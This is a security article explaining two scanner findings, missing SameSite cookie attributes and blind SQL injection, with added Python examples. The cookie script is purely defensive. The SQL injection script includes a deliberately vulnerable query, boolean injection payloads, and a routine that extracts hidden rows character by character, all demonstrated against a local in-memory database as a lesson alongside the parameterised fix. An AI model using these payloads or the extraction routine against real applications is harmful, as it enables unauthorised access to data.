Articles tagged security

Cookie With Insecure or Improper or Missing SameSite Attribute

Issue: Cookie with Insecure or Improper or Missing SameSite attribute
Risk: The SameSite attribute restricts a cookie to a first-party or same-site context and so prevents cookie information leakage on cross-site requests. Without it, the attack can extend to Cross-Site Request Forgery (CSRF) if no additional protection is in place (such as anti-CSRF tokens).
Cause: Sensitive cookie with an improper, insecure or missing SameSite attribute.
Fix: Review possible solutions for configuring the SameSite cookie attribute to the recommended values. On K8s you may edit the ingress configuration and set the SameSite value with the annotation nginx.ingress.kubernetes.io/session-cookie-samesite: "Strict". Note that this annotation only covers the session-affinity cookie that ingress-nginx itself sets; cookies issued by the application must be fixed in the application. Strict also withholds the cookie when a user follows a link from another site, so Lax is the usual choice where that breaks login flows. ……
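The check behind this finding, as an added example that is not code from the original post: a small auditor that parses Set-Cookie header values and flags the cases the scanner reports (no SameSite, an unrecognised value, SameSite=None without Secure), alongside a helper that emits a cookie which passes the check. The header values in SAMPLE_HEADERS are constructed for illustration, not captured from a real application; INGRESSCOOKIE is the default name of the ingress-nginx affinity cookie.

```python
"""Check Set-Cookie headers for a missing or unsafe SameSite attribute and
build a cookie that passes the check.

Added example for the finding above; it is not code from the original post.
The header values in SAMPLE_HEADERS are constructed, not captured from a
real application.
"""
from http.cookies import SimpleCookie

VALID_SAMESITE = {"strict", "lax", "none"}

# Constructed sample Set-Cookie values (typical shapes, not real responses)
SAMPLE_HEADERS = [
    "JSESSIONID=1A2B3C; Path=/; HttpOnly",            # no SameSite at all
    "sid=abc123; Path=/; SameSite=None",              # None without Secure
    "tracker=xyz; Path=/; SameSite=None; Secure",     # cross-site on purpose
    "INGRESSCOOKIE=0d1e; Path=/; HttpOnly; SameSite=Strict; Secure",
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (cookie_name, {attribute: value}).

    Attribute names are lower-cased; flag attributes (Secure, HttpOnly)
    map to an empty string.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, _ = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name.strip(), attrs


def audit_set_cookie(header_value):
    """Return a list of (cookie_name, issue_code) findings; [] means OK.

    Issue codes:
      missing-samesite     no SameSite attribute (the finding in the post)
      invalid-samesite     value is not Strict, Lax or None
      none-without-secure  SameSite=None without Secure; browsers reject it
      none-cross-site      SameSite=None is valid but the cookie travels
                           cross-site, so CSRF protection must exist elsewhere
    """
    name, attrs = parse_set_cookie(header_value)
    samesite = attrs.get("samesite")
    if samesite is None:
        return [(name, "missing-samesite")]
    samesite = samesite.lower()
    if samesite not in VALID_SAMESITE:
        return [(name, "invalid-samesite")]
    if samesite == "none":
        if "secure" not in attrs:
            return [(name, "none-without-secure")]
        return [(name, "none-cross-site")]
    return []


def build_session_cookie(name, value, samesite="Strict"):
    """Emit a Set-Cookie value with SameSite, Secure and HttpOnly set.

    Strict withholds the cookie on every cross-site request, including a
    user following a link from another site; pass "Lax" if that breaks
    login flows.
    """
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["samesite"] = samesite
    cookie[name]["secure"] = True
    cookie[name]["httponly"] = True
    cookie[name]["path"] = "/"
    return cookie[name].OutputString()


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header, "->", audit_set_cookie(header) or "OK")
    print(build_session_cookie("session", "opaque-token-value"))
```

Run it against the headers of a real response (one call per Set-Cookie header, since a response may carry several) and treat every non-empty result as a finding; none-cross-site is a warning rather than an error, because some third-party cookies legitimately need SameSite=None.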


Blind SQL Injection

Security Risk: It is possible to view, modify or delete database entries and tables.
Cause: Sanitization of hazardous characters was not performed correctly on user input.
Fix: Review possible solutions for hazardous character injection.
Reasoning: The test result indicates a vulnerability because values appended to a parameter change the response in a way that shows they were embedded in an SQL query. In this test, three (or sometimes four) requests are sent: the last is logically equal to the original, the next-to-last is different, and any others are for control purposes. If the response to the last request matches the response to the first while the response to the next-to-last differs, the application is vulnerable.
How to fix: https://sequelize.org/v5/manual/raw-queries.html, make sure to ‘replace’/‘bind’ (pass user input as bound parameters rather than concatenating it into the query text) ……
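The three-request comparison described above, as an added example that is not code from the original post (which uses Sequelize): it uses Python's built-in sqlite3 with an in-memory table so it runs offline, shows the string-concatenated query beside its parameterised fix, and then goes one step past the scanner's check to show why the finding matters, recovering a hidden row through the same yes/no oracle. The products table, its rows, and the search_* and make_search functions are constructed for illustration; the `?` placeholder plays the role that Sequelize's replacements/bind options play in the post.

```python
"""Boolean-based blind SQL injection: a vulnerable query, its parameterised
fix, the three-request check the scanner describes, and what an attacker
can extract once the check passes.

Added example for the finding above; it is not code from the original post.
It uses Python's built-in sqlite3 with an in-memory table; the products
table, its rows and the search_* functions are constructed for illustration.
"""
import sqlite3


def make_db():
    """In-memory SQLite database with constructed rows, one of them hidden."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products (name, public) VALUES (?, ?)",
        [("widget", 1), ("gadget", 1), ("secret-prototype", 0)],
    )
    return conn


def search_vulnerable(conn, term):
    """VULNERABLE: user input is concatenated into the SQL text."""
    sql = f"SELECT name FROM products WHERE public = 1 AND name = '{term}'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, term):
    """Parameterised: the driver binds term as data, never as SQL."""
    sql = "SELECT name FROM products WHERE public = 1 AND name = ?"
    return [row[0] for row in conn.execute(sql, (term,))]


def make_search(fixed):
    """Return a search(term) callable over a fresh database."""
    conn = make_db()
    query = search_fixed if fixed else search_vulnerable
    return lambda term: query(conn, term)


def blind_sqli_check(search, term):
    """The scanner's three-request comparison from the post.

    Request 1 is the original value; request 2 appends a predicate that is
    always false; request 3 appends one that is always true, so it is
    logically equal to the original. The parameter is injectable when
    request 3 matches the baseline and request 2 does not.
    """
    baseline = search(term)
    always_false = search(term + "' AND '1'='2")
    always_true = search(term + "' AND '1'='1")
    return baseline == always_true and baseline != always_false


def blind_oracle(search, term, condition):
    """Ask the database a yes/no question through the injectable parameter."""
    baseline = search(term)
    probe = search(f"{term}' AND ({condition}) AND '1'='1")
    return bool(baseline) and probe == baseline


def extract_hidden_name(search, term, max_len=32):
    """Recover the first non-public row's name one character at a time.

    Returns "" when the parameter is not injectable, because the oracle
    never answers yes.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-_"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            condition = (
                f"(SELECT substr(name, {pos}, 1) FROM products "
                f"WHERE public = 0 LIMIT 1) = '{ch}'"
            )
            if blind_oracle(search, term, condition):
                recovered += ch
                break
        else:
            break  # no character matched: end of string (or not injectable)
    return recovered


if __name__ == "__main__":
    for fixed in (False, True):
        search = make_search(fixed)
        label = "parameterised" if fixed else "vulnerable"
        print(label, "injectable:", blind_sqli_check(search, "widget"))
        print(label, "leaked:", repr(extract_hidden_name(search, "widget")))
```

The fixed query returns nothing for the appended payloads, so the always-true variant no longer matches the baseline and the check reports no injection; the vulnerable one leaks the non-public row even though the application never returns it directly.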
